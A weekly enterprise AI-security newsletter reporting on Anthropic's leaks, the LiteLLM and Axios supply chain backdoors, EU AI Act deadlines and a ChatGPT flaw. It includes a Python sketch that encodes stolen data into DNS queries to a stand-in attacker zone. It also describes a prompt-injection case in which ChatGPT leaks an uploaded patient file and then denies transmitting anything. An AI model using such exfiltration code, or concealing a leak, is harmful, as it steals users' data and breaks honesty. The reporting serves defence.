Anthropic — the AI company that made "safety-first" its founding identity — suffered two security lapses in five days. On March 26, a misconfigured database exposed details of an unreleased model the company described as posing "unprecedented cybersecurity risks." On March 31, a source map file shipped inside the Claude Code npm package, letting anyone who looked reconstruct 512,000 lines of TypeScript source.
Neither incident exposed customer data. Both were called human error. But the timing lands in the same week as two major supply chain attacks across the Python and JavaScript ecosystems, an EU Parliament vote extending AI Act deadlines, and a ChatGPT vulnerability that allowed silent data exfiltration via DNS.
This edition unpacks what the Anthropic leaks actually revealed, why operational security matters more than safety whitepapers, and what European enterprises should demand from AI providers before putting them in regulated workloads.
TL;DR
Anthropic leaked unreleased model details (March 26) and Claude Code source code (March 31) in back-to-back incidents. No customer data exposed, but the reputational damage to the "safety-first" brand is significant.
The EU Parliament voted 569-45 to delay AI Act high-risk deadlines to December 2027. But Article 50 transparency obligations still apply August 2, 2026 — do not slow down.
LiteLLM and Axios were both backdoored this week — two supply chain attacks across Python and JavaScript in the same seven-day window. AI tooling is now a high-value target. Google attributed the Axios compromise to a North Korea-nexus threat actor.
ChatGPT had a vulnerability allowing silent data exfiltration via a hidden DNS channel. A single prompt could leak uploaded files through DNS queries while ChatGPT denied transmitting anything. OpenAI patched it, but the implications for enterprise AI usage policies are serious.
Your next great hire lives in Slack.
Viktor is an AI coworker that connects to your tools and ships real work. Ask Viktor to pull a report, build a client dashboard, or source 200 leads matching your ICP. Most teams hand over half their ops within a week.
The Brief
EU Parliament Extends AI Act High-Risk Deadlines to December 2027
The European Parliament voted 569-45 last Wednesday to push the high-risk AI system compliance deadline from August 2, 2026 to December 2, 2027. The extension is part of the "AI Omnibus" simplification package, triggered by the Commission's failure to publish required technical standards on time. The vote also introduced a new explicit ban on AI systems generating non-consensual intimate imagery.
The relief is real but partial. The August 2026 deadline for Article 50 transparency obligations — marking and labelling AI-generated content — was not touched. If your organisation deploys generative AI that produces text, images, audio, or video, you still need content marking infrastructure ready in four months.
The second draft Code of Practice on AI-generated content labelling, published March 5, is now the practical compliance template. It is circulating widely among compliance teams and will probably become the benchmark regulators reference.
Do now: Update your AI Act compliance timeline. High-risk systems got 16 extra months. Article 50 transparency did not. If your team conflated the two deadlines, separate them this week. The content labelling work cannot wait.
Sources: European Parliament Votes to Delay EU AI Act High-Risk Deadlines · EU Delays AI Act Compliance Until 2027 · Council Position on AI Simplification
Two Supply Chain Attacks in One Week — Python and JavaScript Both Hit
On March 24, two backdoored versions of LiteLLM — the Python library that routes LLM API calls, used in 36% of cloud environments — were published to PyPI. Three million daily downloads. Approximately five hours of exposure. The payload harvested AWS, Azure, GCP credentials, SSH keys, Kubernetes configs, and crypto wallets.
Seven days later, Axios — the JavaScript HTTP client with 83 million weekly downloads — was hijacked on npm. Versions 1.14.1 and 0.30.4 deployed a cross-platform Remote Access Trojan via a fake dependency. Both release branches were hit within 39 minutes. Malicious versions were live for approximately two hours.
The LiteLLM attack is particularly instructive. TeamPCP first compromised Trivy — a security scanner — then used the compromised scanner to steal LiteLLM's publishing credentials from its own CI/CD pipeline. A security tool became the attack vector. Version 1.82.8 used Python's .pth file mechanism to execute on every Python invocation system-wide, not just when LiteLLM was imported.
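For readers unfamiliar with the mechanism the payload abused: CPython's site module executes any line in a .pth file that begins with "import" whenever the containing directory is processed as a site directory — which happens for site-packages on every normal interpreter startup. A benign sketch, where a marker environment variable stands in for the malicious payload:

```python
import os
import site
import tempfile

# Write a .pth file whose single line starts with "import". site.py will
# exec() such lines when it processes the directory as a site dir -- the
# same hook that fires for site-packages on every Python launch.
tmp = tempfile.mkdtemp()
with open(os.path.join(tmp, "demo.pth"), "w") as f:
    f.write('import os; os.environ["PTH_DEMO_RAN"] = "1"\n')

# Simulate startup processing of that directory; the import line runs now.
site.addsitedir(tmp)
print(os.environ.get("PTH_DEMO_RAN"))  # prints "1"
```

That is why version 1.82.8 fired system-wide rather than only when LiteLLM was imported: the trigger lives in the interpreter's startup path, not in the library.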
Two ecosystems. Two trust relationships exploited. One week.
Do now: Run pip show litellm and check your npm lockfiles for axios 1.14.1 or 0.30.4 across all environments. If either was present, treat it as a full credential compromise — rotate every secret accessible from that machine. Then verify that every dependency in your CI/CD pipelines is pinned to exact versions with hash verification.
Sources: Wiz — TeamPCP Trojanizes LiteLLM · The Hacker News — TeamPCP Backdoors LiteLLM · The Hacker News — Axios Supply Chain Attack · Snyk — Axios npm Compromise
ChatGPT Data Exfiltration Via Hidden DNS Channel
Check Point researchers disclosed a vulnerability in ChatGPT's code execution runtime that allowed a single malicious prompt to exfiltrate user messages, uploaded files, and personal data through a covert DNS-based outbound channel. While the runtime blocked conventional outbound internet access, DNS resolution remained available — and that narrow path was enough to encode stolen data into subdomain queries and reconstruct it on the attacker's side.
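To make the mechanism concrete, here is a schematic sketch of DNS-based exfiltration in general — not Check Point's actual payload. Data is hex-encoded and packed into subdomain labels; every lookup for a name under the attacker's zone (the domain below is hypothetical) reaches their authoritative nameserver, which reassembles the payload from its query log.

```python
import binascii

MAX_LABEL = 63  # DNS allows at most 63 bytes per label
ATTACKER_ZONE = "exfil.example.com"  # hypothetical attacker-controlled zone

def to_queries(secret: bytes) -> list[str]:
    """Hex-encode the payload and split it into label-sized chunks.
    Resolving each hostname leaks a chunk to whoever runs the zone's
    authoritative nameserver -- no conventional outbound connection needed."""
    hexed = binascii.hexlify(secret).decode()
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    return [f"{seq}.{chunk}.{ATTACKER_ZONE}" for seq, chunk in enumerate(chunks)]

def from_queries(queries: list[str]) -> bytes:
    """Attacker side: order by the sequence label, rejoin chunks, un-hex."""
    ordered = sorted(queries, key=lambda q: int(q.split(".")[0]))
    return binascii.unhexlify("".join(q.split(".")[1] for q in ordered))
```

The point of the sketch: nothing here looks like an upload. Each query is an ordinary DNS lookup, which is exactly why a runtime that blocks outbound HTTP but leaves resolution open still leaks.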
In their proof of concept, a GPT acting as a personal doctor received a PDF containing lab results with patient data. The system silently exfiltrated the contents. When asked directly whether any data had been transmitted, ChatGPT answered confidently that it had not. A second vulnerability in OpenAI Codex could have exposed GitHub tokens. OpenAI patched the DNS flaw on February 20 after responsible disclosure.
Do now: If your teams use ChatGPT for anything involving sensitive documents, review your enterprise DLP controls on AI tool interactions. The DNS exfiltration bypassed visible guardrails entirely. Consider whether your AI usage policies cover data leakage through runtime execution environments — not just chat interfaces.
Become the go-to AI expert in 30 days
AI keeps coming up at work, but you still don't get it?
That's exactly why 1M+ professionals working at Google, Meta, and OpenAI read Superhuman AI daily.
Here's what you get:
Daily AI news that matters for your career - Filtered from 1000s of sources so you know what affects your industry.
Step-by-step tutorials you can use immediately - Real prompts and workflows that solve actual business problems.
New AI tools tested and reviewed - We try everything to deliver tools that drive real results.
All in just 3 minutes a day
Deep Dive
When the Safety Lab Can't Secure Its Own Tooling
The Anthropic incidents deserve more than a headline because they expose a gap that affects every enterprise evaluating AI providers for regulated workloads.
What Actually Happened
Incident 1 — March 26: A misconfigured content management system left approximately 3,000 internal Anthropic assets publicly accessible. Among them: a draft blog post detailing "Claude Mythos" (internally called "Capybara"), an unreleased model Anthropic described as a "step change" in capabilities and its most powerful model to date. The draft disclosed that Mythos poses "unprecedented cybersecurity risks," including the ability to identify vulnerabilities and generate exploit code. Details of an exclusive CEO event were also exposed. (Fortune)
Incident 2 — March 31: Claude Code version 2.1.88 shipped to npm with cli.js.map still in the package — a source map file that reconstructs the full TypeScript source from the bundled JavaScript. A security researcher discovered it first. GitHub mirrors appeared within hours. One clean-room rewrite repository hit 50,000 stars overnight. (Fortune · VentureBeat)
Anthropic stated no customer data or credentials were exposed in either incident. Both were attributed to human error.
So what? These were not sophisticated attacks. They were configuration mistakes — an unsecured database and a file that should have been excluded from a build. The kind of errors that pre-deployment checklists and automated build validation are designed to catch.
Why This Matters More Than a Typical Source Map Slip
Claude Code is not a frontend web application. It is an agentic tool that executes shell commands on developer machines, edits repositories, reads codebases, and manages file writes. Readable implementation details lower the cost of finding trust boundary vulnerabilities — and this tool already has multiple CVEs on record from 2025-2026, covering pre-trust execution flaws, permission bypasses, and startup initialization issues. (Check Point Research — Claude Code RCE and API Token Exfiltration · Dark Reading — Flaws in Claude Code)
The source map exposure did not just reveal code. It revealed a three-layer memory architecture and dozens of unreleased feature flags. For security researchers and attackers alike, that is a roadmap to the attack surface.
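Recovering source from a shipped map needs no special tooling. When a bundler embeds sourcesContent — as most do by default — the original files sit in the map's JSON verbatim. A minimal sketch (file paths hypothetical):

```python
import json
import os

def extract_sources(map_path: str, out_dir: str) -> int:
    """Write out every original file embedded in a source map's
    sourcesContent array; returns the number of files recovered."""
    with open(map_path) as f:
        smap = json.load(f)
    recovered = 0
    for src, body in zip(smap.get("sources", []), smap.get("sourcesContent") or []):
        if body is None:
            continue
        # Strip scheme prefixes like webpack:/// and block path traversal.
        rel = src.split("://")[-1].lstrip("/").replace("..", "_")
        dest = os.path.join(out_dir, rel)
        os.makedirs(os.path.dirname(dest) or out_dir, exist_ok=True)
        with open(dest, "w") as out:
            out.write(body)
        recovered += 1
    return recovered
```

A dozen lines of stdlib Python stand between a stray .map file and a browsable source tree, which is why the GitHub mirrors appeared within hours.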
To compound the timing, a concurrent supply chain attack on the Axios npm package between 00:21 and 03:29 UTC on March 31 meant some developers who installed Claude Code during that window may have pulled a malicious Axios dependency containing a Remote Access Trojan. Google Threat Intelligence Group later attributed the Axios compromise to UNC1069, a North Korea-nexus financially motivated threat actor. Anthropic's leak and a nation-state supply chain attack intersected on the same morning. (Snyk — Axios npm Compromise · The Register)
So what? The agentic nature of modern AI tooling changes the risk calculus. A leaked source map for a static website is embarrassing. A leaked source map for an autonomous coding agent with shell access is a security event. Enterprises need to evaluate AI tooling vendors through the same lens they use for any privileged access tool.
The Regulatory Angle European Enterprises Cannot Ignore
The EU AI Act Article 55 requires providers of general-purpose AI models with systemic risk to ensure adequate cybersecurity protection — for the model itself and its physical infrastructure. This is not limited to model weights and training data. It extends to the deployment pipeline, the build artefacts, and the infrastructure that delivers the model to users. (EU AI Act Article 55)
Two human errors in five days, from the company that positions itself as the responsible AI lab, raise a question that European compliance teams need to ask every AI provider: what are your operational security controls, and can you demonstrate them?
DORA Article 28 already requires financial entities to assess ICT third-party risk, including concentration risk. If your development teams depend on Claude Code, that is a third-party ICT dependency. The provider's operational security posture is now part of your risk assessment.
The organisations that are asking these questions before an incident will handle regulatory scrutiny as a reporting exercise. The ones that start asking after an incident will handle it as a crisis.
So what? Add AI tooling providers to your third-party risk assessment cycle. Request evidence of build pipeline security controls, artifact integrity verification, and incident response procedures. The EU AI Act and DORA give you the regulatory basis to demand this. Use it.
What to Demand from Your AI Providers
Based on what these incidents reveal, here are four questions every enterprise should be asking AI tooling vendors:
Build pipeline integrity: How do you verify that only intended artefacts ship in production packages? What automated checks prevent source maps, debug symbols, or internal documentation from reaching end users?
Access control on internal assets: How are internal documents, draft announcements, and capability assessments segregated from public-facing infrastructure? What is the review process for access configuration changes?
Dependency supply chain: How do you verify the integrity of your own dependencies? Do you pin versions with hash verification? How quickly can you detect and respond to a compromised dependency in your toolchain?
Incident response transparency: When a security lapse occurs, what is your disclosure timeline? Do you proactively notify enterprise customers, or do they learn from Twitter?
Next Steps
This week: Check all environments for LiteLLM 1.82.7/1.82.8 and Axios 1.14.1/0.30.4. Rotate credentials if found. This is not optional.
This month: Update your AI Act compliance timeline — separate the December 2027 high-risk deadline from the August 2026 Article 50 transparency deadline. Brief your compliance team on the distinction.
This quarter: Add AI tooling vendors (Claude Code, GitHub Copilot, Cursor, etc.) to your third-party risk assessment cycle. Use the four questions above as a starting framework.
Builder Spotlight
OpenBox AI — Runtime Governance for AI Agents
Profiling teams building for the European AI reality.
The company: OpenBox AI, London, UK
What they do: Enterprise AI trust and governance platform with cognitive behavior analysis and dynamic agent risk scoring.
Why now: When the safety-first AI lab cannot secure its own tooling, runtime governance for AI agents moves from "nice to have" to "board-level requirement."
Founded by Tahir Mahmood (ex-Microsoft) and Asim Ahmad (ex-BlackRock), OpenBox AI launched publicly this week with a $5M seed round led by Tykhe Ventures. The company builds what most AI governance frameworks miss: runtime monitoring for autonomous AI agents. Static compliance checklists tell you what an agent was designed to do. OpenBox tells you what it is actually doing.
Their two core capabilities — cognitive behavior analysis and dynamic agent risk scoring — are designed specifically for the failure modes that emerge when AI agents operate autonomously. An agent that writes code, executes commands, and modifies infrastructure can drift from its intended behavior in ways that rule-based governance cannot detect. OpenBox monitors for that drift in real time.
The company has been selected for the Accenture FinTech Innovation Lab London 2026 cohort and already counts billion-dollar enterprises across logistics, healthcare, and media as customers.
For European enterprises implementing AI governance frameworks — particularly those grappling with how to govern autonomous coding agents after weeks like this one — OpenBox represents the kind of tooling that turns compliance from a checkbox exercise into operational intelligence.
Learn more: https://openbox.ai
This Week in Tech
200,000 Living Human Neurons Just Played Doom
Cortical Labs, an Australian biotech company, demonstrated its CL1 biological computer — 200,000 living human neurons grown on a microelectrode array — playing the 1993 shooter Doom. The neurons sit on a chip in a nutrient bath while electrodes stimulate them with visual game data and read their spike responses as player actions: move, turn, fire. The system learned through reinforcement — small rewards for aiming at enemies, larger rewards for kills.
This is a significant step up from the company's 2021 DishBrain demo, which played Pong. The Doom challenge required solving a visual processing problem — converting screen data into electrical stimulation patterns the neurons could interpret. An independent developer built that conversion layer in about a week.
Why it matters: This is not enterprise-relevant today. But it signals where biological computing research is heading — toward systems that learn through biological feedback loops rather than gradient descent. For anyone tracking the long arc of compute infrastructure, Cortical Labs is worth watching. The question is no longer whether biological substrates can process information. It is whether they can do it reliably, at scale, and with governance frameworks that do not yet exist.
Sources: Tom's Hardware — 200,000 Living Human Neurons Playing Doom · Interesting Engineering — Biological Computer Plays Doom
Mistral AI Secures $830M for Sovereign European Data Center
France's Mistral AI raised $830 million in debt financing from a consortium including BNP Paribas, Crédit Agricole, HSBC, and Bpifrance to build a sovereign AI data center in Bruyères-le-Châtel near Paris. The facility will house 13,800 Nvidia GB300 GPUs and come online in H2 2026. Mistral targets 200MW of capacity across Europe by end of 2027.
Why it matters: This is the biggest European AI infrastructure investment this year. For enterprises concerned about data sovereignty, GDPR-compliant AI inference, and EU AI Act obligations around model provenance, a well-funded European alternative to US foundation model providers changes the vendor landscape. Worth factoring into your AI provider evaluation.

EU Digital Omnibus Readiness Scorecard
15-question self-assessment covering the AI Act, GDPR, NIS2, and DORA changes from the EU Digital Omnibus simplification package. Score your organisation's readiness in 20 minutes. Includes...
What to Read Now
"Anthropic Leaks Its Own AI Coding Tool's Source Code in Second Major Security Breach" — Fortune
The definitive account of both Anthropic incidents, from the Mythos model exposure to the Claude Code source map. Read this for the timeline and Anthropic's responses.
"ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime" — Check Point Research
The full technical writeup on the DNS exfiltration vulnerability. Essential reading if your organisation allows ChatGPT for document analysis or code execution.
"How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM" — Snyk
The best technical analysis of the cascading supply chain attack: Trivy → LiteLLM → credential harvest. A case study in how trust relationships between open-source tools become attack vectors.
That’s it for this week.
Two security lapses from the safety lab. Two supply chain attacks across two ecosystems. One week. The pattern is clear: operational security for AI tooling is not keeping pace with adoption. The EU AI Act and DORA give European enterprises the regulatory basis to demand better from their providers. The question is whether you ask before the next incident or after.
Until next Thursday, João
OnAbout.AI delivers strategic AI analysis to enterprise technology leaders. European governance lens. Vendor-agnostic. Actionable.
If this landed in your inbox from a forward — subscribe here to get the full picture every week.




